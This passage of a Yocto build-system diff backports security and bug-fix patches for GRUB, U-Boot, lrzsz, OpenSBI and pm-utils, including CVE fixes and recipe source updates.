+--- a/include/grub/bitmap.h
++++ b/include/grub/bitmap.h
+@@ -23,6 +23,7 @@
+ #include <grub/symbol.h>
+ #include <grub/types.h>
+ #include <grub/video.h>
++#include <grub/safemath.h>
+ 
+ struct grub_video_bitmap
+ {
+@@ -79,6 +80,23 @@ grub_video_bitmap_get_height (struct grub_video_bitmap *bitmap)
+   return bitmap->mode_info.height;
+ }
+ 
++/*
++ * Calculate and store the size of data buffer of 1bit bitmap in result.
++ * Equivalent to "*result = (width * height + 7) / 8" if no overflow occurs.
++ * Return true when overflow occurs or false if there is no overflow.
++ * This function is intentionally implemented as a macro instead of
++ * an inline function. Although a bit awkward, it preserves data types for
++ * safemath macros and reduces macro side effects as much as possible.
++ *
++ * XXX: Will report false overflow if width * height > UINT64_MAX.
++ */
++#define grub_video_bitmap_calc_1bpp_bufsz(width, height, result) \
++({ \
++  grub_uint64_t _bitmap_pixels; \
++  grub_mul ((width), (height), &_bitmap_pixels) ? 1 : \
++    grub_cast (_bitmap_pixels / GRUB_CHAR_BIT + !!(_bitmap_pixels % GRUB_CHAR_BIT), (result)); \
++})
++
+ void EXPORT_FUNC (grub_video_bitmap_get_mode_info) (struct grub_video_bitmap *bitmap,
+ 						    struct grub_video_mode_info *mode_info);
+ 
+diff --git a/include/grub/safemath.h b/include/grub/safemath.h
+index c17b89b..bb0f826 100644
+--- a/include/grub/safemath.h
++++ b/include/grub/safemath.h
+@@ -30,6 +30,8 @@
+ #define grub_sub(a, b, res)	__builtin_sub_overflow(a, b, res)
+ #define grub_mul(a, b, res)	__builtin_mul_overflow(a, b, res)
+ 
++#define grub_cast(a, res)	grub_add ((a), 0, (res))
++
+ #else
+ #error gcc 5.1 or newer or clang 3.8 or newer is required
+ #endif
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
new file mode 100644
index 0000000000..504352b4e3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
@@ -0,0 +1,107 @@
+From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001
+From: Matthew Garrett <mjg@redhat.com>
+Date: Mon, 13 Jan 2014 12:13:09 +0000
+Subject: Don't permit loading modules on UEFI secure boot
+
+Author: Colin Watson <cjwatson@ubuntu.com>
+Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch
+Forwarded: no
+Last-Update: 2013-12-25
+
+Patch-Name: no-insmod-on-sb.patch
+
+Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch]
+
+Backport of a Debian (and Fedora) patch implementing a way to get secure boot status
+for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport.
+Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch
+
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/dl.c      | 13 +++++++++++++
+ grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++
+ include/grub/efi/efi.h   |  1 +
+ 3 files changed, 42 insertions(+)
+
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..074dfc3c6 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -38,6 +38,10 @@
+ #define GRUB_MODULES_MACHINE_READONLY
+ #endif
+ 
++#ifdef GRUB_MACHINE_EFI
++#include <grub/efi/efi.h>
++#endif
++
+ 
+ 
+ #pragma GCC diagnostic ignored "-Wcast-align"
+@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename)
+   void *core = 0;
+   grub_dl_t mod = 0;
+ 
++#ifdef GRUB_MACHINE_EFI
++  if (grub_efi_secure_boot ())
++    {
++      grub_error (GRUB_ERR_ACCESS_DENIED,
++		  "Secure Boot forbids loading module from %s", filename);
++      return 0;
++    }
++#endif
++
+   grub_boot_time ("Loading module %s", filename);
+ 
+   file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE);
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6e1ceb905..96204e39b 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid,
+   return NULL;
+ }
+ 
++grub_efi_boolean_t
++grub_efi_secure_boot (void)
++{
++  grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++  grub_size_t datasize;
++  char *secure_boot = NULL;
++  char *setup_mode = NULL;
++  grub_efi_boolean_t ret = 0;
++
++  secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize);
++
++  if (datasize != 1 || !secure_boot)
++    goto out;
++
++  setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize);
++
++  if (datasize != 1 || !setup_mode)
++    goto out;
++
++  if (*secure_boot && !*setup_mode)
++    ret = 1;
++
++ out:
++  grub_free (secure_boot);
++  grub_free (setup_mode);
++  return ret;
++}
++
+ #pragma GCC diagnostic ignored "-Wcast-align"
+ 
+ /* Search the mods section from the PE32/PE32+ image. This code uses
+diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h
+index e90e00dc4..a237952b3 100644
+--- a/include/grub/efi/efi.h
++++ b/include/grub/efi/efi.h
+@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var,
+ 				     const grub_efi_guid_t *guid,
+ 				     void *data,
+ 				     grub_size_t datasize);
++grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void);
+ int
+ EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1,
+ 					     const grub_efi_device_path_t *dp2);
diff --git a/meta/recipes-bsp/grub/grub2.inc b/meta/recipes-bsp/grub/grub2.inc
index 4ec7d0b0fc..bea03f4fc1 100644
--- a/meta/recipes-bsp/grub/grub2.inc
+++ b/meta/recipes-bsp/grub/grub2.inc
@@ -13,6 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
 
 CVE_PRODUCT = "grub2"
 
+# Applies only to RHEL
+CVE_CHECK_WHITELIST += "CVE-2019-14865"
+# Applies only to SUSE
+CVE_CHECK_WHITELIST += "CVE-2021-46705"
+
 SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
            file://0001-Disable-mfpmath-sse-as-well-when-SSE-is-disabled.patch \
            file://autogen.sh-exclude-pc.patch \
@@ -27,7 +32,86 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
            file://script-Remove-unused-fields-from-grub_script_functio.patch \
            file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \
            file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \
-"
+           file://determinism.patch \
+           file://no-insmod-on-sb.patch \
+           file://CVE-2020-14372_1.patch \
+           file://CVE-2020-14372_2.patch \
+           file://CVE-2020-14372_3.patch \
+           file://CVE-2020-14372_4.patch \
+           file://CVE-2020-14372_5.patch \
+           file://CVE-2020-14372.patch \
+           file://CVE-2020-27779.patch \
+           file://CVE-2020-27779_2.patch \
+           file://CVE-2020-27779_3.patch \
+           file://CVE-2020-27779_4.patch \
+           file://CVE-2020-27779_5.patch \
+           file://CVE-2020-27779_6.patch \
+           file://CVE-2020-27779_7.patch \
+           file://CVE-2020-25632.patch \
+           file://CVE-2020-25647.patch \
+           file://0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch \
+           file://0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch \
+           file://0003-net-tftp-Fix-dangling-memory-pointer.patch \
+           file://0004-kern-parser-Fix-resource-leak-if-argc-0.patch \
+           file://0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch \
+           file://0006-kern-efi-Fix-memory-leak-on-failure.patch \
+           file://0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch \
+           file://0008-gnulib-regexec-Resolve-unused-variable.patch \
+           file://0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch \
+           file://0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch \
+           file://0011-gnulib-regexec-Fix-possible-null-dereference.patch \
+           file://0012-gnulib-regcomp-Fix-uninitialized-re_token.patch \
+           file://0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch \
+           file://0014-zstd-Initialize-seq_t-structure-fully.patch \
+           file://0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch \
+           file://0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch \
+           file://0017-disk-ldm-If-failed-then-free-vg-variable-too.patch \
+           file://0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch \
+           file://0019-disk-cryptodisk-Fix-potential-integer-overflow.patch \
+           file://0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch \
+           file://0021-zfs-Fix-possible-negative-shift-operation.patch \
+           file://0022-zfs-Fix-resource-leaks-while-constructing-path.patch \
+           file://0023-zfs-Fix-possible-integer-overflows.patch \
+           file://0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch \
+           file://0025-affs-Fix-memory-leaks.patch \
+           file://0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch \
+           file://0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch \
+           file://0028-syslinux-Fix-memory-leak-while-parsing.patch \
+           file://0029-normal-completion-Fix-leaking-of-memory-when-process.patch \
+           file://0030-commands-hashsum-Fix-a-memory-leak.patch \
+           file://0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch \
+           file://0032-video-fb-fbfill-Fix-potential-integer-overflow.patch \
+           file://0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch \
+           file://0034-video-fb-video_fb-Fix-possible-integer-overflow.patch \
+           file://0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch \
+           file://0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch \
+           file://0037-loader-bsd-Check-for-NULL-arg-up-front.patch \
+           file://0038-loader-xnu-Fix-memory-leak.patch \
+           file://0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch \
+           file://0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch \
+           file://0041-util-grub-install-Fix-NULL-pointer-dereferences.patch \
+           file://0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch \
+           file://0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch \
+           file://0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch \
+           file://0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch \
+           file://0046-script-execute-Avoid-crash-when-using-outside-a-func.patch \
+           file://CVE-2021-3981.patch \
+           file://CVE-2021-3695.patch \
+           file://CVE-2021-3696.patch \
+           file://CVE-2021-3697.patch \
+           file://CVE-2022-28733.patch \
+           file://CVE-2022-28734.patch \
+           file://CVE-2022-28736.patch \
+           file://CVE-2022-28735.patch \
+           file://font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch \
+           file://CVE-2022-2601.patch \
+           file://CVE-2022-3775.patch \
+           file://CVE-2020-27749.patch \
+           file://CVE-2021-20225.patch \
+           file://CVE-2021-20233.patch \
+           file://CVE-2023-4692.patch \
+           file://CVE-2023-4693.patch \
+           "
 SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934"
 SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea"
 
@@ -46,6 +130,8 @@ GRUBPLATFORM ??= "pc"
 
 inherit autotools gettext texinfo pkgconfig
 
+CFLAGS_remove = "-O2"
+
 EXTRA_OECONF = "--with-platform=${GRUBPLATFORM} \
                 --disable-grub-mkfont \
                 --program-prefix="" \
diff --git a/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
new file mode 100644
index 0000000000..47c7ec4170
--- /dev/null
+++ b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
@@ -0,0 +1,36 @@
+From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Wed, 11 Nov 2020 22:58:55 -0800
+Subject: [PATCH] Fix cross compilation using autoconf detected AR
+
+currently its using 'ar' program from build host, which is not expected,
+we need to respect AR passed in environment
+
+Upstream-Status: Pending
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ configure.in | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/configure.in b/configure.in
+index 4ddbe8b..b7c3c31 100644
+--- a/configure.in
++++ b/configure.in
+@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog,
+ 	  ])
+ 
+ dnl Checks for programs.
++m4_ifndef([AC_PROG_AR],[dnl
++  AN_MAKEVAR([AR], [AC_PROG_AR])
++  AN_PROGRAM([ar], [AC_PROG_AR])
++  AC_DEFUN([AC_PROG_AR],
++  [AC_CHECK_TOOL(AR, ar, :)])
++])
++AC_PROG_AR
+ AC_PROG_CC
+ AC_PROG_GCC_TRADITIONAL
+ dnl AC_PROG_INSTALL  included in AM_INIT_AUTOMAKE
+-- 
+2.29.2
+
diff --git a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
index 4129237c59..54c431eeb3 100644
--- a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
+++ b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
@@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \
            file://lrzsz-check-locale.h.patch \
            file://cve-2018-10195.patch \
            file://include.patch \
+           file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \
            "
 
 SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4"
diff --git a/meta/recipes-bsp/opensbi/opensbi_0.6.bb b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
index 56f2d4b915..972d8de17d 100644
--- a/meta/recipes-bsp/opensbi/opensbi_0.6.bb
+++ b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
@@ -1,5 +1,6 @@
 SUMMARY = "RISC-V Open Source Supervisor Binary Interface (OpenSBI)"
 DESCRIPTION = "OpenSBI aims to provide an open-source and extensible implementation of the RISC-V SBI specification for a platform specific firmware (M-mode) and a general purpose OS, hypervisor or bootloader (S-mode or HS-mode). OpenSBI implementation can be easily extended by RISC-V platform or System-on-Chip vendors to fit a particular hadware configuration."
+HOMEPAGE = "https://github.com/riscv/opensbi"
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://COPYING.BSD;md5=42dd9555eb177f35150cf9aa240b61e5"
 
@@ -8,7 +9,7 @@ require opensbi-payloads.inc
 inherit autotools-brokensep deploy
 
 SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862"
-SRC_URI = "git://github.com/riscv/opensbi.git \
+SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \
            file://0001-Makefile-Don-t-specify-mabi-or-march.patch \
           "
 
diff --git a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
index cac09101c4..fa3b993788 100644
--- a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
+++ b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
@@ -19,9 +19,12 @@ PACKAGECONFIG[manpages] = "--enable-doc, --disable-doc, libxslt-native xmlto-nat
 
 RDEPENDS_${PN} = "grep bash"
 
+EXTRA_OECONF = "--libdir=${nonarch_libdir}"
+
 do_configure_prepend () {
 	( cd ${S}; autoreconf -f -i -s )
 }
 
-FILES_${PN} += "${libdir}/${BPN}/*"
+FILES_${PN} += "${nonarch_libdir}/${BPN}/*"
 FILES_${PN}-dbg += "${datadir}/doc/pm-utils/README.debugging"
+FILES_${PN}-dev += "${nonarch_libdir}/pkgconfig/pm-utils.pc"
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch
new file mode 100644
index 0000000000..d784452b44
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch
@@ -0,0 +1,98 @@
+From 67acad3db71bb372458fbb8a77749f5eb88aa324 Mon Sep 17 00:00:00 2001
+From: Simon Glass <sjg@chromium.org>
+Date: Wed, 18 Mar 2020 11:44:01 -0600
+Subject: [PATCH] image: Check hash-nodes when checking configurations
+
+It is currently possible to use a different configuration's signature and
+thus bypass the configuration check. Make sure that the configuration node
+that was hashed matches the one being checked, to catch this problem.
+
+Also add a proper function comment to fit_config_check_sig() and make it
+static.
+
+Signed-off-by: Simon Glass <sjg@chromium.org>
+
+CVE: CVE-2020-10648
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/67acad3db71bb372458fbb8a77749f5eb88aa324]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ common/image-sig.c | 36 +++++++++++++++++++++++++++++++++---
+ 1 file changed, 33 insertions(+), 3 deletions(-)
+
+diff --git a/common/image-sig.c b/common/image-sig.c
+index 13ccd50bc5..03143a4040 100644
+--- a/common/image-sig.c
++++ b/common/image-sig.c
+@@ -359,20 +359,39 @@ int fit_image_verify_required_sigs(const void *fit, int image_noffset,
+ 	return 0;
+ }
+ 
+-int fit_config_check_sig(const void *fit, int noffset, int required_keynode,
+-			 char **err_msgp)
++/**
++ * fit_config_check_sig() - Check the signature of a config
++ *
++ * @fit: FIT to check
++ * @noffset: Offset of configuration node (e.g. /configurations/conf-1)
++ * @required_keynode:	Offset in the control FDT of the required key node,
++ *			if any. If this is given, then the configuration wil not
++ *			pass verification unless that key is used. If this is
++ *			-1 then any signature will do.
++ * @conf_noffset: Offset of the configuration subnode being checked (e.g.
++ *	 /configurations/conf-1/kernel)
++ * @err_msgp:		In the event of an error, this will be pointed to a
++ *			help error string to display to the user.
++ * @return 0 if all verified ok, <0 on error
++ */
++static int fit_config_check_sig(const void *fit, int noffset,
++				int required_keynode, int conf_noffset,
++				char **err_msgp)
+ {
+ 	char * const exc_prop[] = {"data"};
+ 	const char *prop, *end, *name;
+ 	struct image_sign_info info;
+ 	const uint32_t *strings;
++	const char *config_name;
+ 	uint8_t *fit_value;
+ 	int fit_value_len;
++	bool found_config;
+ 	int max_regions;
+ 	int i, prop_len;
+ 	char path[200];
+ 	int count;
+ 
++	config_name = fit_get_name(fit, conf_noffset, NULL);
+ 	debug("%s: fdt=%p, conf='%s', sig='%s'\n", __func__, gd_fdt_blob(),
+ 	      fit_get_name(fit, noffset, NULL),
+ 	      fit_get_name(gd_fdt_blob(), required_keynode, NULL));
+@@ -413,9 +432,20 @@ int fit_config_check_sig(const void *fit, int noffset, int required_keynode,
+ 	char *node_inc[count];
+ 
+ 	debug("Hash nodes (%d):\n", count);
++	found_config = false;
+ 	for (name = prop, i = 0; name < end; name += strlen(name) + 1, i++) {
+ 		debug("   '%s'\n", name);
+ 		node_inc[i] = (char *)name;
++		if (!strncmp(FIT_CONFS_PATH, name, strlen(FIT_CONFS_PATH)) &&
++		    name[sizeof(FIT_CONFS_PATH) - 1] == '/' &&
++		    !strcmp(name + sizeof(FIT_CONFS_PATH), config_name)) {
++			debug("      (found config node %s)", config_name);
++			found_config = true;
++		}
++	}
++	if (!found_config) {
++		*err_msgp = "Selected config not in hashed nodes";
++		return -1;
+ 	}
+ 
+ 	/*
+@@ -483,7 +513,7 @@ static int fit_config_verify_sig(const void *fit, int conf_noffset,
+ 		if (!strncmp(name, FIT_SIG_NODENAME,
+ 			     strlen(FIT_SIG_NODENAME))) {
+ 			ret = fit_config_check_sig(fit, noffset, sig_offset,
+-						   &err_msg);
++						   conf_noffset, &err_msg);
+ 			if (ret) {
+ 				puts("- ");
+ 			} else {
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch
new file mode 100644
index 0000000000..023f7eac0a
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch
@@ -0,0 +1,52 @@
+From 8a9d03732e6d0f68107c80919096e7cf956dcb3d Mon Sep 17 00:00:00 2001
+From: Simon Glass <sjg@chromium.org>
+Date: Wed, 18 Mar 2020 11:44:02 -0600
+Subject: [PATCH] image: Load the correct configuration in fit_check_sign
+
+At present bootm_host_load_images() is passed the configuration that has
+been verified, but ignores it and just uses the default configuration.
+This may not be the same.
+
+Update this function to use the selected configuration.
+
+Signed-off-by: Simon Glass <sjg@chromium.org>
+
+CVE: CVE-2020-10648
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/8a9d03732e6d0f68107c80919096e7cf956dcb3d]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ common/bootm.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/common/bootm.c b/common/bootm.c
+index 902c13880d..db4362a643 100644
+--- a/common/bootm.c
++++ b/common/bootm.c
+@@ -819,7 +819,8 @@ void __weak switch_to_non_secure_mode(void)
+ #else /* USE_HOSTCC */
+ 
+ #if defined(CONFIG_FIT_SIGNATURE)
+-static int bootm_host_load_image(const void *fit, int req_image_type)
++static int bootm_host_load_image(const void *fit, int req_image_type,
++				 int cfg_noffset)
+ {
+ 	const char *fit_uname_config = NULL;
+ 	ulong data, len;
+@@ -831,6 +832,7 @@ static int bootm_host_load_image(const void *fit, int req_image_type)
+ 	void *load_buf;
+ 	int ret;
+ 
++	fit_uname_config = fdt_get_name(fit, cfg_noffset, NULL);
+ 	memset(&images, '\0', sizeof(images));
+ 	images.verify = 1;
+ 	noffset = fit_image_load(&images, (ulong)fit,
+@@ -878,7 +880,7 @@ int bootm_host_load_images(const void *fit, int cfg_noffset)
+ 	for (i = 0; i < ARRAY_SIZE(image_types); i++) {
+ 		int ret;
+ 
+-		ret = bootm_host_load_image(fit, image_types[i]);
++		ret = bootm_host_load_image(fit, image_types[i], cfg_noffset);
+ 		if (!err && ret && ret != -ENOENT)
+ 			err = ret;
+ 	}
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch
new file mode 100644
index 0000000000..b0a16efeaa
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch
@@ -0,0 +1,114 @@
+From 5749faa3d6837d6dbaf2119fc3ec49a326690c8f Mon Sep 17 00:00:00 2001
+From: Tom Rini <trini@konsulko.com>
+Date: Tue, 21 Jan 2020 11:53:38 -0500
+Subject: [PATCH] cmd/gpt: Address error cases during gpt rename more correctly
+
+New analysis by the tool has shown that we have some cases where we
+weren't handling the error exit condition correctly.  When we ran into
+the ENOMEM case we wouldn't exit the function and thus incorrect things
+could happen.  Rework the unwinding such that we don't need a helper
+function now and free what we may have allocated.
+
+Fixes: 18030d04d25d ("GPT: fix memory leaks identified by Coverity")
+Reported-by: Coverity (CID: 275475, 275476)
+Cc: Alison Chaiken <alison@she-devel.com>
+Cc: Simon Goldschmidt <simon.k.r.goldschmidt@gmail.com>
+Cc: Jordy <jordy@simplyhacker.com>
+Signed-off-by: Tom Rini <trini@konsulko.com>
+Reviewed-by: Simon Goldschmidt <simon.k.r.goldschmidt@gmail.com>
+
+CVE: CVE-2020-8432
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/5749faa3d6837d6dbaf2119fc3ec49a326690c8f]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ cmd/gpt.c | 47 ++++++++++++-----------------------------------
+ 1 file changed, 12 insertions(+), 35 deletions(-)
+
+diff --git a/cmd/gpt.c b/cmd/gpt.c
+index 0c4349f4b2..964702bad4 100644
+--- a/cmd/gpt.c
++++ b/cmd/gpt.c
+@@ -633,21 +633,6 @@ static int do_disk_guid(struct blk_desc *dev_desc, char * const namestr)
+ }
+ 
+ #ifdef CONFIG_CMD_GPT_RENAME
+-/*
+- * There are 3 malloc() calls in set_gpt_info() and there is no info about which
+- * failed.
+- */
+-static void set_gpt_cleanup(char **str_disk_guid,
+-			    disk_partition_t **partitions)
+-{
+-#ifdef CONFIG_RANDOM_UUID
+-	if (str_disk_guid)
+-		free(str_disk_guid);
+-#endif
+-	if (partitions)
+-		free(partitions);
+-}
+-
+ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ 			       char *name1, char *name2)
+ {
+@@ -655,7 +640,7 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ 	struct disk_part *curr;
+ 	disk_partition_t *new_partitions = NULL;
+ 	char disk_guid[UUID_STR_LEN + 1];
+-	char *partitions_list, *str_disk_guid;
++	char *partitions_list, *str_disk_guid = NULL;
+ 	u8 part_count = 0;
+ 	int partlistlen, ret, numparts = 0, partnum, i = 1, ctr1 = 0, ctr2 = 0;
+ 
+@@ -697,14 +682,8 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ 	/* set_gpt_info allocates new_partitions and str_disk_guid */
+ 	ret = set_gpt_info(dev_desc, partitions_list, &str_disk_guid,
+ 			   &new_partitions, &part_count);
+-	if (ret < 0) {
+-		del_gpt_info();
+-		free(partitions_list);
+-		if (ret == -ENOMEM)
+-			set_gpt_cleanup(&str_disk_guid, &new_partitions);
+-		else
+-			goto out;
+-	}
++	if (ret < 0)
++		goto out;
+ 
+ 	if (!strcmp(subcomm, "swap")) {
+ 		if ((strlen(name1) > PART_NAME_LEN) || (strlen(name2) > PART_NAME_LEN)) {
+@@ -766,14 +745,8 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ 	 * Even though valid pointers are here passed into set_gpt_info(),
+ 	 * it mallocs again, and there's no way to tell which failed.
+ 	 */
+-	if (ret < 0) {
+-		del_gpt_info();
+-		free(partitions_list);
+-		if (ret == -ENOMEM)
+-			set_gpt_cleanup(&str_disk_guid, &new_partitions);
+-		else
+-			goto out;
+-	}
++	if (ret < 0)
++		goto out;
+ 
+ 	debug("Writing new partition table\n");
+ 	ret = gpt_restore(dev_desc, disk_guid, new_partitions, numparts);
+@@ -795,10 +768,14 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ 	}
+ 	printf("new partition table with %d partitions is:\n", numparts);
+ 	print_gpt_info();
+-	del_gpt_info();
+  out:
+-	free(new_partitions);
+-	free(str_disk_guid);
++	del_gpt_info();
++#ifdef CONFIG_RANDOM_UUID
++	if (str_disk_guid)
++		free(str_disk_guid);
++#endif
++	if (new_partitions)
++		free(new_partitions);
+ 	free(partitions_list);
+ 	return ret;
+ }
diff --git a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
index 613e3161fb..8234b86162 100644
--- a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
+++ b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
@@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1"
 LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c"
 SECTION = "libs"
 
-SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https"
+SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master"
 SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-bsp/u-boot/u-boot-common.inc b/meta/recipes-bsp/u-boot/u-boot-common.inc
index 4a17894c49..91fe08966b 100644
--- a/meta/recipes-bsp/u-boot/u-boot-common.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-common.inc
@@ -14,10 +14,13 @@ PE = "1"
 # repo during parse
 SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd"
 
-SRC_URI = "git://git.denx.de/u-boot.git \
+SRC_URI = "git://source.denx.de/u-boot/u-boot.git;protocol=https;branch=master \
            file://remove-redundant-yyloc-global.patch \
+           file://CVE-2020-8432.patch \
+           file://CVE-2020-10648-1.patch \
+           file://CVE-2020-10648-2.patch \
           "
-
+          
 S = "${WORKDIR}/git"
 B = "${WORKDIR}/build"
 do_configure[cleandirs] = "${B}"
diff --git a/meta/recipes-bsp/u-boot/u-boot-tools.inc b/meta/recipes-bsp/u-boot/u-boot-tools.inc
index 8ae290acc6..4ed936a70d 100644
--- a/meta/recipes-bsp/u-boot/u-boot-tools.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-tools.inc
@@ -23,6 +23,21 @@ SED_CONFIG_EFI_armeb = ''
 SED_CONFIG_EFI_aarch64 = ''
 
 do_compile () {
+	# Yes, this is crazy. If you build on a system with git < 2.14 from scratch, the tree will
+	# be marked as "dirty" and the version will include "-dirty", leading to a reproducibility problem.
+	# The issue is the inode count for Licnses/README changing due to do_populate_lic hardlinking a
+	# copy of the file. We avoid this by ensuring the index is updated with a "git diff" before the
+	# u-boot machinery tries to determine the version.
+	#
+	# build$ ../git/scripts/setlocalversion ../git
+	# ""
+	# build$ ln ../git/
